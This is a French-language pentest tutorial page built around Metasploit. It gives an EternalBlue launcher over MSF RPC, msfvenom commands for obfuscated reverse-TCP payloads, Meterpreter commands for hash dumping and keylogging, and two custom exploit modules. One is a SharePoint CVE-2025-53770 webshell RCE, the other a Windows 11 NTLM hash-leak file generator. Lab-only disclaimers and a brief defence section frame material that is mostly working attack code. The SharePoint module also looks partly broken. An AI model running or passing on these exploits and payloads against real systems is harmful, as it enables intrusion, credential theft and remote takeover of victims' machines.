🛡️ Metasploit Maestro v1 - Découverte et Exploitation de Failles en Lab
Framework offensif pour pentest éthique : scans avancés, exploits CVE, payloads custom – analyse, exécution, et défenses solides.
🎯 Introduction
Bienvenue dans Metasploit Maestro v1, forgé par Platon-Y pour Echoes of Hackers et pctamalou.fr. Ce framework Ruby est l'épée du samouraï cyber – on l'utilise pour tester les armures, pas pour attaquer les villages. Focus sur discovery, exploitation CVE (comme EternalBlue, CVE-2024-30078 WiFi RCE, CVE-2023-38646 Metabase pre-auth, et fraiche comme CVE-2025-53770 SharePoint 0-day), et payloads msfvenom. Lab isolé only, éthique stricte : on attaque pour mieux défendre. Inspiré de Vinny Troia (Hunting Cyber Criminals).
Exploits réels en simu – autorisation écrite requise.
Nous forgeons pour protéger
🛠️ Prérequis
- Kali Linux isolé (VM ou réseau fermé)
- Metasploit installé (msfconsole, msfvenom, msfdb) – update avec apt update && apt upgrade metasploit-framework pour modules 2025
- Outils : nmap, arp-scan, VirtualBox/VMware pour lab
- Cibles : Metasploitable3, Windows vulnérable (e.g., Win7 pour EternalBlue, ou SharePoint setup pour CVE-2025-53770)
- Connaissances : Réseau, Ruby basique, CVE hunting
- Éthique : Test en mode safe d'abord !
🔧 Setup Lab
Crée un lab isolé pour éviter les drames. Utilise VirtualBox : réseau host-only (192.168.56.0/24). Machine attaquante : Kali. Cible : Metasploitable3 ou Win vulnérable à MS17-010, ou un SharePoint test pour CVE-2025-53770 (installe via Docker pour simu rapide).
Attaquant : Kali
IP: 192.168.56.101
Commands : sudo msfdb init ; msfconsole -q
Cible : Metasploitable3 ou SharePoint
IP: 192.168.56.102
Vulns : Multiples pour tests, incluant HTTP/445
🔍 Analyse & Commands
Metasploit : framework Ruby modulaire (exploits, payloads, auxiliaries). Inspiré de Vinny Troia (Chapitre 4 : Advanced NMAP), on commence par recon OSINT-like.
⚠️ CADRE JURIDIQUE FRANÇAIS - LISEZ ATTENTIVEMENT
Conformément aux articles 323-1 à 323-3-1 du Code Pénal :
- Ce code est fourni à des fins de RECHERCHE ACADEMIQUE uniquement
- L'exécution nécessite une AUTORISATION ÉCRITE du responsable du lab
- Vous devez être inscrit dans un établissement d'enseignement supérieur
- Conservez cette autorisation pendant 3 ans (Art. 6 Loi 78-17)
Je certifie être chercheur/étudiant en cybersécurité
Je dispose d'une autorisation écrite pour ce lab
Je n'utiliserai pas ce code en production
Deep dive : Modules en Ruby (lib/msf/core/exploit.rb). Twist : Mini-script Python pour MSF RPC.
# Interface Python avancée pour Metasploit RPC
# pctamalou.fr
# D'abord, démarrez le daemon : msfrpcd -f -S -U msf -P msfrpc -p 55552
import msfrpc
import json
class MetasploitManager:
def __init__(self, password='msfrpc', host='127.0.0.1', port=55552):
self.client = msfrpc.MsfRpcClient(password, host=host, port=port)
print("[+] Connecté à Metasploit RPC")
def execute_console(self, command):
"""Exécute une commande dans la console msfconsole"""
console_id = self.client.console.create()['id']
self.client.console.write(console_id, command)
result = self.client.console.read(console_id)
return result.get('data', '')
def quick_exploit(self, rhost, lhost, exploit_path):
"""Lance un exploit rapidement"""
commands = [
f"use {exploit_path}",
f"set RHOSTS {rhost}",
f"set LHOST {lhost}",
"exploit -j"
]
for cmd in commands:
self.execute_console(cmd)
print(f"[+] Exploit lancé contre {rhost}")
# Usage
if __name__ == "__main__":
msf = MetasploitManager()
msf.quick_exploit("192.168.56.102", "192.168.56.101", "exploit/windows/smb/ms17_010_eternalblue")
🦠 Exploitation CVE
Scénario threat hunting : OSINT (Vinny Chap 4) -> Scan -> Exploit. EternalBlue (MS17-010) comme classique, CVE-2024-30078 (WiFi RCE), CVE-2023-38646 (Metabase pre-auth), et frais comme CVE-2025-53770 (SharePoint 0-day RCE pour du fun enterprise). Note : Pour CVE-2024-30078, module ajouté en 2025 – vérifiez avec search cve:2024-30078.
💣 Création Payload msfvenom
Fin en apothéose : Générez payloads custom, obfuscés pour evasion. Pour 2025, ajoutez -x pour template et -k pour keep.
# APK Android reverse TCP msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 R > payload.apk # EXE Windows obfuscé msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4444 -f exe -x /tmp/legit.exe -k -o payload.exe # Handler multi use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.56.101 set LPORT 4444 set ExitOnSession false exploit -j -z
🛡️ Stratégies de Protection
On flippe le script : Passez Blue Team. Patch CVE (Windows Update, SharePoint hotfixes), Fail2Ban sur SSH/SMB/HTTP, iptables -A INPUT -p tcp --dport 445 -j DROP. SIEM Elastic pour détecter Metasploit signatures (e.g., rules pour CVE-2025-53770 traffic).
- IDS Snort rules pour EternalBlue/SharePoint
- AppArmor/SELinux enforcing sur services
- Honeypots (Cowrie) pour trap exploits
#!/bin/bash # Nettoyage post-Metasploit echo "🔥 Nettoyage en cours..." systemctl stop postgresql rm -rf /opt/metasploit-framework/embedded/framework/data/meterpreter/* iptables -F echo "✅ Lab propre !"
⚡ Meterpreter Quick Commands
sysinfo # Info système getuid # UID actuel hashdump # Dump hashes screenshot # Capture écran migrate -N explorer.exe # Migration process keyscan_start # Keylogger shell # Ouvrir shell run post/windows/gather/credentials/gpp # Gather creds
🏆 Bonus & Suggestions
Pour clore en maestro, voici un module custom Ruby pour CVE-2025-53770 (SharePoint RCE via unsafe deserialization). Copie-le dans ~/.msf4/modules/exploits/windows/sharepoint/, puis msfconsole > reload_all. Teste en lab avec un SharePoint vuln (Docker : docker run -p 80:80 sharepoint-vuln:2025). Bonus twist : un module pour CVE-2025-24071 (Win11 NTLM leak via .library-ms).
Bonus : Créez un module custom Ruby pour une CVE.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft SharePoint RCE via Unsafe Deserialization (CVE-2025-53770)',
'Description' => %q{
This module exploits CVE-2025-53770, an unauthenticated RCE in SharePoint Server via unsafe deserialization in ToolPane.aspx.
It bypasses auth with crafted Referer and uploads a malicious .aspx webshell for Meterpreter reverse shell.
},
'License' => MSF_LICENSE,
'Author' => ['Platon-Y '], # Custom pour notre vibe
'References' => [
['CVE', '2025-53770'],
['URL', 'https://www.microsoft.com/en-us/msrc/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770']
],
'Platform' => 'win',
'Arch' => [ARCH_X64],
'Targets' => [['SharePoint Server 2016/2019/Subscription', {}]],
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => '2025-07-20'
)
)
register_options([
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('PAYLOAD', [false, 'Payload to execute', 'windows/meterpreter/reverse_tcp'])
])
end
def check
res = send_request_cgi('uri' => normalize_uri(target_uri.path, '/_layouts/15/ToolPane.aspx'), 'method' => 'GET')
return Exploit::CheckCode::Detected if res && res.code == 200 && res.body.include?('ToolPane')
Exploit::CheckCode::Safe
end
def exploit
print_status("Sending auth bypass and malicious payload...")
payload_aspx = Rex::Text.rand_text_alpha(8) + ".aspx"
# Générer un webshell ASPX proper (exemple avec payload encoded)
webshell = Msf::Util::EXE.to_aspx(generate_payload_exe) # Ou craft un serialized payload pour deserialization RCE
post_data = {
'MSOTlPn_Uri' => "#{datastore['TARGETURI']}",
'MSOTlPn_DWP' => webshell # Malicious deserialization payload
}
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx'),
'vars_post' => post_data,
'headers' => {
'Referer' => normalize_uri(target_uri.path, '/_layouts/SignOut.aspx'), # Auth bypass
'Content-Type' => 'application/x-www-form-urlencoded'
}
})
if res && res.code == 200
print_good("Webshell uploaded: #{payload_aspx}")
# Handler pour reverse shell
handler
else
print_error("Exploit failed!")
end
end
def handler
# Standard Metasploit handler pour payload
super
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
class MetasploitModule < Msf::Exploit::FILEFORMAT
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows 11 NTLM Hash Leak via Malicious .library-ms (CVE-2025-24071)',
'Description' => %q{
This module generates a malicious .library-ms file in a ZIP. When extracted and opened in Explorer on Win11,
it triggers SMB auth to attacker, leaking NTLM hashes. Use with auxiliary/server/capture/smb for relay.
},
'License' => MSF_LICENSE,
'Author' => ['Platon-Y '],
'References' => [
['CVE', '2025-24071'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2025-24071']
],
'Platform' => 'win',
'Arch' => [ARCH_X64],
'Targets' => [['Windows 11', {}]],
'DefaultTarget' => 0
)
)
register_options([
OptString.new('FILENAME', [true, 'Output file', 'exploit.zip']),
OptString.new('ATTACKER_IP', [true, 'Your IP for SMB relay', '192.168.56.101'])
])
end
def exploit
library_content = Rex::Text.rand_text_alpha(8) + ".library-ms"
malicious_xml = "\\\\#{datastore['ATTACKER_IP']}\\shared\\icon.ico " # Triggers SMB to attacker
zip = Rex::Zip::Archive.new
zip.add_file(library_content, malicious_xml)
file_create(zip.pack)
print_good("Generated #{datastore['FILENAME']} – Host it, let victim extract/open, capture hashes with auxiliary/server/capture/smb")
end
end
Suggestion 1 : Intégrez Cobalt Strike pour C2 avancé avec beacon sur SharePoint exploit.
Suggestion 2 : Lab challenge : Exploitez Metasploitable3 sans hints, ou setup SharePoint vuln pour CVE-2025-53770.